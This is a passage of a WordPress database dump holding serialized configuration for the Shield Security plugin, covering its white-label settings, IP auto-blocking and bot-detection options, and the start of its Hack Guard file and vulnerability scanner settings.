admins.\";}i:11;a:10:{s:3:\"key\";s:17:\"wl_pluginnamemain\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:6:\"Shield\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"Plugin Name\";s:7:\"summary\";s:22:\"The Name Of The Plugin\";s:11:\"description\";s:23:\"The Name Of The Plugin.\";}i:12;a:10:{s:3:\"key\";s:11:\"wl_namemenu\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:15:\"Shield Security\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"Menu Title\";s:7:\"summary\";s:33:\"The Main Menu Title Of The Plugin\";s:11:\"description\";s:79:\"The Main Menu Title Of The Plugin. If left empty, the Plugin Name will be used.\";}i:13;a:10:{s:3:\"key\";s:14:\"wl_companyname\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:17:\"One Dollar Plugin\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Company Name\";s:7:\"summary\";s:24:\"The Name Of Your Company\";s:11:\"description\";s:33:\"Provide the name of your company.\";}i:14;a:10:{s:3:\"key\";s:14:\"wl_description\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:74:\"Secure Your Sites With The World\'s Most Powerful WordPress Security Plugin\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Plugin Tag Line\";s:7:\"summary\";s:26:\"The Tag Line Of The Plugin\";s:11:\"description\";s:27:\"The Tag Line Of The Plugin.\";}i:15;a:10:{s:3:\"key\";s:10:\"wl_homeurl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:18:\"https://icwp.io/7f\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:8:\"Home URL\";s:7:\"summary\";s:20:\"Plugin Home Page URL\";s:11:\"description\";s:84:\"When a user clicks the home link for this plugin, this is where they\'ll be directed.\";}i:16;a:10:{s:3:\"key\";s:14:\"wl_menuiconurl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:20:\"pluginlogo_16x16.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:9:\"Menu Icon\";s:7:\"summary\";s:13:\"Menu Icon URL\";s:11:\"description\";s:42:\"The URL of the icon displayed in the menu.\";}i:17;a:10:{s:3:\"key\";s:19:\"wl_dashboardlogourl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:22:\"pluginlogo_128x128.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Dashboard Logo\";s:7:\"summary\";s:18:\"Dashboard Logo URL\";s:11:\"description\";s:72:\"The URL of the logo displayed in the main dashboard. Should be 128x128px\";}i:18;a:10:{s:3:\"key\";s:19:\"wl_login2fa_logourl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:29:\"pluginlogo_banner-772x250.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Dashboard Logo\";s:7:\"summary\";s:18:\"Dashboard Logo URL\";s:11:\"description\";s:72:\"The URL of the logo displayed in the main dashboard. Should be 128x128px\";}}s:11:\"definitions\";a:3:{s:22:\"restricted_pages_users\";a:2:{i:0;s:13:\"user-edit.php\";i:1;s:9:\"users.php\";}s:6:\"events\";a:2:{s:11:\"key_success\";a:1:{s:6:\"recent\";b:1;}s:8:\"key_fail\";a:3:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}}s:19:\"options_to_restrict\";a:4:{s:12:\"wpms_options\";a:3:{i:0;s:11:\"admin_email\";i:1;s:9:\"site_name\";i:2;s:12:\"registration\";}s:10:\"wpms_pages\";a:1:{i:0;s:12:\"settings.php\";}s:10:\"wp_options\";a:9:{i:0;s:8:\"blogname\";i:1;s:15:\"blogdescription\";i:2;s:7:\"siteurl\";i:3;s:4:\"home\";i:4;s:11:\"admin_email\";i:5;s:18:\"users_can_register\";i:6;s:15:\"comments_notify\";i:7;s:18:\"comment_moderation\";i:8;s:11:\"blog_public\";}s:8:\"wp_pages\";a:4:{i:0;s:19:\"options-general.php\";i:1;s:22:\"options-discussion.php\";i:2;s:19:\"options-reading.php\";i:3;s:11:\"options.php\";}}}s:10:\"meta_modts\";i:1572181749;}'),(33627,1,'shield_mod_config_55c607cb742abb39bad8ecba226bcd07','a:8:{s:4:\"slug\";s:3:\"ips\";s:10:\"properties\";a:13:{s:4:\"slug\";s:3:\"ips\";s:4:\"name\";s:22:\"Block Bad IPs/Visitors\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:3:\"ips\";s:7:\"tagline\";s:68:\"Automatically detect bots and malicious visitors and stop them dead.\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:100;}s:13:\"admin_notices\";a:1:{s:19:\"visitor-whitelisted\";a:5:{s:2:\"id\";s:19:\"visitor-whitelisted\";s:8:\"schedule\";s:10:\"conditions\";s:16:\"plugin_page_only\";b:1;s:8:\"per_user\";b:1;s:4:\"type\";s:4:\"info\";}}s:12:\"requirements\";a:1:{s:3:\"php\";a:2:{s:9:\"functions\";a:1:{i:0;s:10:\"filter_var\";}s:9:\"constants\";a:5:{i:0;s:18:\"FILTER_VALIDATE_IP\";i:1;s:16:\"FILTER_FLAG_IPV4\";i:2;s:16:\"FILTER_FLAG_IPV6\";i:3;s:25:\"FILTER_FLAG_NO_PRIV_RANGE\";i:4;s:24:\"FILTER_FLAG_NO_RES_RANGE\";}}}s:8:\"sections\";a:8:{i:0;a:5:{s:4:\"slug\";s:23:\"section_auto_black_list\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Automatic IP Black List\";s:11:\"title_short\";s:22:\"Auto IP Blocking Rules\";s:7:\"summary\";a:2:{i:0;s:136:\"Purpose - The Automatic IP Black List system will block the IP addresses of naughty visitors after a specified number of transgressions.\";i:1;s:68:\"Recommendation - Keep the Automatic IP Black List feature turned on.\";}}i:1;a:4:{s:4:\"slug\";s:14:\"section_logins\";s:5:\"title\";s:18:\"Capture Login Bots\";s:11:\"title_short\";s:10:\"Login Bots\";s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:2;a:4:{s:4:\"slug\";s:14:\"section_probes\";s:5:\"title\";s:20:\"Capture Probing Bots\";s:11:\"title_short\";s:12:\"Probing Bots\";s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:3;a:4:{s:4:\"slug\";s:18:\"section_behaviours\";s:5:\"title\";s:30:\"Identify Common Bot Behaviours\";s:11:\"title_short\";s:14:\"Bot Behaviours\";s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:4;a:4:{s:4:\"slug\";s:37:\"section_enable_plugin_feature_bottrap\";s:5:\"title\";s:22:\"Enable Module: BotTrap\";s:11:\"title_short\";s:13:\"Enable Module\";s:7:\"summary\";a:2:{i:0;s:89:\"Purpose - BotTrap monitors a typical set of bot behaviours to help identify probing bots.\";i:1;s:54:\"Recommendation - Enable as many bot traps as possible.\";}}i:5;a:4:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:6;a:4:{s:4:\"slug\";s:33:\"section_enable_plugin_feature_ips\";s:5:\"title\";s:25:\"Enable Module: IP Manager\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:95:\"Purpose - The IP Manager allows you to whitelist, blacklist and configure auto-blacklist rules.\";i:1;s:123:\"Recommendation - Keep the IP Manager feature turned on. You should also carefully review the automatic black list settings.\";}}i:7;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:14:{i:0;a:9:{s:3:\"key\";s:10:\"enable_ips\";s:7:\"section\";s:33:\"section_enable_plugin_feature_ips\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/ea\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf26\";s:4:\"name\";s:17:\"Enable IP Manager\";s:7:\"summary\";s:41:\"Enable (or Disable) The IP Manager module\";s:11:\"description\";s:69:\"Un-Checking this option will completely disable the IP Manager module\";}i:1;a:9:{s:3:\"key\";s:19:\"transgression_limit\";s:7:\"section\";s:23:\"section_auto_black_list\";s:7:\"default\";i:10;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:22:\"https://icwp.io/wpsf24\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf26\";s:4:\"name\";s:13:\"Offense Limit\";s:7:\"summary\";s:72:\"Visitor IP address will be Black Listed after X bad actions on your site\";s:11:\"description\";s:280:\"A black mark is set against an IP address each time a visitor trips the defenses of the Shield plugin. When the number of these offenses exceeds specified limit, they are automatically blocked from accessing the site. Set this to 0 to turn off the Automatic IP Black List feature.\";}i:2;a:10:{s:3:\"key\";s:11:\"auto_expire\";s:7:\"section\";s:23:\"section_auto_black_list\";s:7:\"default\";s:3:\"day\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:6:\"minute\";s:4:\"text\";s:6:\"Minute\";}i:1;a:2:{s:9:\"value_key\";s:4:\"hour\";s:4:\"text\";s:4:\"Hour\";}i:2;a:2:{s:9:\"value_key\";s:3:\"day\";s:4:\"text\";s:3:\"Day\";}i:3;a:2:{s:9:\"value_key\";s:4:\"week\";s:4:\"text\";s:4:\"Week\";}i:4;a:2:{s:9:\"value_key\";s:5:\"month\";s:4:\"text\";s:5:\"Month\";}}s:9:\"link_info\";s:22:\"https://icwp.io/wpsf25\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf26\";s:4:\"name\";s:21:\"Auto Block Expiration\";s:7:\"summary\";s:65:\"After 1 \'X\' a black listed IP will be removed from the black list\";s:11:\"description\";s:249:\"Permanent and lengthy IP Black Lists are harmful to performance. You should allow IP addresses on the black list to be eventually removed over time. Shorter IP black lists are more efficient and a more intelligent use of an IP-based blocking system.\";}i:3;a:11:{s:3:\"key\";s:17:\"user_auto_recover\";s:7:\"section\";s:23:\"section_auto_black_list\";s:7:\"premium\";b:1;s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:2:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:4:\"gasp\";s:4:\"text\";s:26:\"With Shield Bot Protection\";}}s:9:\"link_info\";s:18:\"https://icwp.io/f8\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"User Auto Unblock\";s:7:\"summary\";s:34:\"Allow Visitors To Unblock Their IP\";s:11:\"description\";s:73:\"Allow visitors blocked by the plugin to automatically unblock themselves.\";}i:4;a:11:{s:3:\"key\";s:16:\"text_loginfailed\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/e8\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Login Failed\";s:7:\"summary\";s:62:\"Visitor Triggers The IP Offenses System Through A Failed Login\";s:11:\"description\";s:63:\"This message is displayed if the visitor fails a login attempt.\";}i:5;a:11:{s:3:\"key\";s:9:\"track_404\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:18:\"https://icwp.io/fo\";s:9:\"link_blog\";s:18:\"https://icwp.io/f7\";s:4:\"name\";s:10:\"404 Detect\";s:7:\"summary\";s:33:\"Identify A Bot When It Hits A 404\";s:11:\"description\";s:53:\"Detect When A Visitor Browses To A Non-Existent Page.\";}i:6;a:11:{s:3:\"key\";s:16:\"track_linkcheese\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:18:\"https://icwp.io/fo\";s:9:\"link_blog\";s:18:\"https://icwp.io/f6\";s:4:\"name\";s:11:\"Link Cheese\";s:7:\"summary\";s:38:\"Tempt A Bot With A Fake Link To Follow\";s:11:\"description\";s:45:\"Detect A Bot That Follows A \'no-follow\' Link.\";}i:7;a:11:{s:3:\"key\";s:12:\"track_xmlrpc\";s:7:\"section\";s:14:\"section_probes\";s:7:\"default\";s:3:\"log\";s:7:\"premium\";b:1;s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:18:\"https://icwp.io/fo\";s:9:\"link_blog\";s:18:\"https://icwp.io/f7\";s:4:\"name\";s:14:\"XML-RPC Access\";s:7:\"summary\";s:39:\"Identify A Bot When It Accesses XML-RPC\";s:11:\"description\";s:53:\"If you don\'t use XML-RPC, why would anyone access it?\";}i:8;a:10:{s:3:\"key\";s:17:\"track_loginfailed\";s:7:\"section\";s:14:\"section_logins\";s:7:\"default\";s:20:\"transgression-single\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:18:\"https://icwp.io/fn\";s:9:\"link_blog\";s:18:\"https://icwp.io/f7\";s:4:\"name\";s:12:\"Failed Login\";s:7:\"summary\";s:47:\"Detect Failed Login Attempts By Valid Usernames\";s:11:\"description\";s:61:\"Penalise a visitor who fails to login using a valid username.\";}i:9;a:11:{s:3:\"key\";s:18:\"track_logininvalid\";s:7:\"section\";s:14:\"section_logins\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:18:\"https://icwp.io/fn\";s:9:\"link_blog\";s:18:\"https://icwp.io/f7\";s:4:\"name\";s:17:\"Invalid Usernames\";s:7:\"summary\";s:30:\"Detect Invalid Username Logins\";s:11:\"description\";s:67:\"Identify A Bot When It Tries To Login With A Non-Existent Username.\";}i:10;a:11:{s:3:\"key\";s:20:\"track_fakewebcrawler\";s:7:\"section\";s:18:\"section_behaviours\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:18:\"https://icwp.io/f5\";s:9:\"link_blog\";s:18:\"https://icwp.io/f7\";s:4:\"name\";s:16:\"Fake Web Crawler\";s:7:\"summary\";s:34:\"Detect Fake Search Engine Crawlers\";s:11:\"description\";s:89:\"Identify a Bot when it presents as an official web crawler, but analysis shows it\'s fake.\";}i:11;a:11:{s:3:\"key\";s:15:\"track_useragent\";s:7:\"section\";s:18:\"section_behaviours\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:18:\"https://icwp.io/fi\";s:9:\"link_blog\";s:18:\"https://icwp.io/f7\";s:4:\"name\";s:17:\"Empty User Agents\";s:7:\"summary\";s:38:\"Detect Requests With Empty User Agents\";s:11:\"description\";s:62:\"Identify a request as a bot if the user agent is not provided.\";}i:12;a:11:{s:3:\"key\";s:19:\"text_remainingtrans\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/e9\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"Remaining Offenses\";s:7:\"summary\";s:64:\"Visitor Triggers The IP Offenses System Through A Firewall Block\";s:11:\"description\";s:132:\"This message is displayed if the visitor triggered the IP Offenses system and reports how many offenses remain before being blocked.\";}i:13;a:5:{s:3:\"key\";s:15:\"autounblock_ips\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:4:{s:10:\"db_classes\";a:1:{s:3:\"ips\";s:62:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\IPs\\Handler\";}s:19:\"ip_lists_table_name\";s:8:\"ip_lists\";s:21:\"ip_list_table_columns\";a:10:{i:0;s:2:\"id\";i:1;s:2:\"ip\";i:2;s:5:\"label\";i:3;s:4:\"list\";i:4;s:3:\"ip6\";i:5;s:8:\"is_range\";i:6;s:14:\"transgressions\";i:7;s:14:\"last_access_at\";i:8;s:10:\"created_at\";i:9;s:10:\"deleted_at\";}s:6:\"events\";a:12:{s:14:\"custom_offense\";a:2:{s:3:\"cat\";i:3;s:7:\"offense\";b:1;}s:9:\"conn_kill\";a:1:{s:3:\"cat\";i:3;}s:10:\"ip_offense\";a:1:{s:3:\"cat\";i:2;}s:10:\"ip_blocked\";a:1:{s:3:\"cat\";i:2;}s:15:\"ip_unblock_flag\";a:1:{s:3:\"cat\";i:1;}s:12:\"bottrack_404\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:23:\"bottrack_fakewebcrawler\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:19:\"bottrack_linkcheese\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:20:\"bottrack_loginfailed\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:21:\"bottrack_logininvalid\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:18:\"bottrack_useragent\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:15:\"bottrack_xmlrpc\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1572181749;}'),(33628,1,'shield_mod_config_28846cfa14181f0cc1ad7b65b438a337','a:8:{s:4:\"slug\";s:12:\"hack_protect\";s:10:\"properties\";a:13:{s:4:\"slug\";s:12:\"hack_protect\";s:4:\"name\";s:10:\"Hack Guard\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:12:\"hack_protect\";s:7:\"tagline\";s:63:\"Automatically detect and repair vulnerable and suspicious items\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:5:\"order\";i:70;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;}s:10:\"menu_items\";a:1:{i:0;a:3:{s:5:\"title\";s:5:\"Scans\";s:4:\"slug\";s:14:\"scans-redirect\";s:8:\"callback\";s:0:\"\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:14:\"scans-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:5:\"scans\";}}}s:8:\"sections\";a:11:{i:0;a:4:{s:4:\"slug\";s:20:\"section_scan_options\";s:5:\"title\";s:12:\"Scan Options\";s:11:\"title_short\";s:8:\"Schedule\";s:7:\"summary\";a:1:{i:0;s:54:\"Purpose - Set how often the Hack Guard scans will run.\";}}i:1;a:5:{s:4:\"slug\";s:16:\"section_scan_wcf\";s:7:\"primary\";b:1;s:5:\"title\";s:27:\"WordPress Core File Scanner\";s:11:\"title_short\";s:20:\"WP Core File Scanner\";s:7:\"summary\";a:2:{i:0;s:100:\"Purpose - Regularly scan your WordPress core files for changes compared to official WordPress files.\";i:1;s:72:\"Recommendation - Keep the Core File Integrity Scanner feature turned on.\";}}i:2;a:4:{s:4:\"slug\";s:16:\"section_scan_ufc\";s:5:\"title\";s:26:\"Unrecognised Files Scanner\";s:11:\"title_short\";s:26:\"Unrecognised Files Scanner\";s:7:\"summary\";a:2:{i:0;s:84:\"Purpose - Scan your WordPress core folders for unrecognised files that don\'t belong.\";i:1;s:71:\"Recommendation - Keep the Unrecognised Files Scanner feature turned on.\";}}i:3;a:4:{s:4:\"slug\";s:16:\"section_scan_apc\";s:5:\"title\";s:22:\"Abandoned Plugin Check\";s:11:\"title_short\";s:22:\"Abandoned Plugin Check\";s:7:\"summary\";a:2:{i:0;s:96:\"Purpose - Regularly scan your WordPress plugins and themes for plugins that have been abandoned.\";i:1;s:125:\"Recommendation - Ensure this is turned on and you will always know if any of your assets have known security vulnerabilities.\";}}i:4;a:4:{s:4:\"slug\";s:16:\"section_realtime\";s:5:\"title\";s:19:\"Realtime Protection\";s:11:\"title_short\";s:19:\"Realtime Protection\";s:7:\"summary\";a:2:{i:0;s:61:\"Purpose - Provides realtime protection for certain key files.\";i:1;s:73:\"Recommendation - Keep realtime protection turned on to protect key files.\";}}i:5;a:4:{s:4:\"slug\";s:16:\"section_scan_mal\";s:5:\"title\";s:12:\"Malware Scan\";s:11:\"title_short\";s:12:\"Malware Scan\";s:7:\"summary\";a:2:{i:0;s:62:\"Purpose - Detect malicious changes to your themes and plugins.\";i:1;s:64:\"Recommendation - Keep the Plugins/Theme Guard feature turned on.\";}}i:6;a:5:{s:4:\"slug\";s:16:\"section_scan_ptg\";s:10:\"help_video\";a:3:{s:8:\"provider\";s:5:\"vimeo\";s:9:\"embed_url\";s:62:\"https://player.vimeo.com/video/256755089?color=3fde23&byline=0\";s:2:\"id\";s:9:\"256755089\";}s:5:\"title\";s:20:\"Plugins/Themes Guard\";s:11:\"title_short\";s:20:\"Plugins/Themes Guard\";s:7:\"summary\";a:2:{i:0;s:62:\"Purpose - Detect malicious changes to your themes and plugins.\";i:1;s:64:\"Recommendation - Keep the Plugins/Theme Guard feature turned on.\";}}i:7;a:4:{s:4:\"slug\";s:16:\"section_scan_wpv\";s:5:\"title\";s:21:\"Vulnerability Scanner\";s:11:\"title_short\";s:21:\"Vulnerability Scanner\";s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Regularly scan your WordPress plugins and themes for known security vulnerabilities.\";i:1;s:125:\"Recommendation - Ensure this is turned on and you will always know if any of your assets have known security vulnerabilities.\";}}i:8;a:4:{s:4:\"slug\";s:26:\"section_integrity_checking\";s:5:\"title\";s:16:\"Integrity Checks\";s:11:\"title_short\";s:16:\"Integrity Checks\";s:7:\"summary\";a:2:{i:0;s:58:\"Purpose - Monitor for unrecognised changes to your system.\";i:1;s:104:\"Recommendation - Enable these to automatically recover from unauthorized changes to your WordPress site.\";}}i:9;a:4:{s:4:\"slug\";s:51:\"section_enable_plugin_feature_hack_protection_tools\";s:5:\"title\";s:25:\"Enable Module: Hack Guard\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Hack Guard is a set of tools to warn you and protect you against hacks on your site.\";i:1;s:54:\"Recommendation - Keep the Hack Guard module turned on.\";}}i:10;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:37:{i:0;a:9:{s:3:\"key\";s:19:\"enable_hack_protect\";s:7:\"section\";s:51:\"section_enable_plugin_feature_hack_protection_tools\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:22:\"https://icwp.io/wpsf38\";s:9:\"link_blog\";s:18:\"https://icwp.io/9x\";s:4:\"name\";s:17:\"Enable Hack Guard\";s:7:\"summary\";s:41:\"Enable (or Disable) The Hack Guard Module\";s:11:\"description\";s:69:\"Un-Checking this option will completely disable the Hack Guard module\";}i:1;a:10:{s:3:\"key\";s:16:\"rt_file_wpconfig\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:9:\"WP Config\";s:7:\"summary\";s:34:\"Lock WP Config Against Any Changes\";s:11:\"description\";s:80:\"As soon as changes are detected to the WP config file the file will be reverted.\";}i:2;a:11:{s:3:\"key\";s:18:\"enable_wpvuln_scan\";s:7:\"section\";s:16:\"section_scan_wpv\";s:7:\"premium\";b:1;s:7:\"default\";s:13:\"enabled_email\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:23:\"Automatic Scan 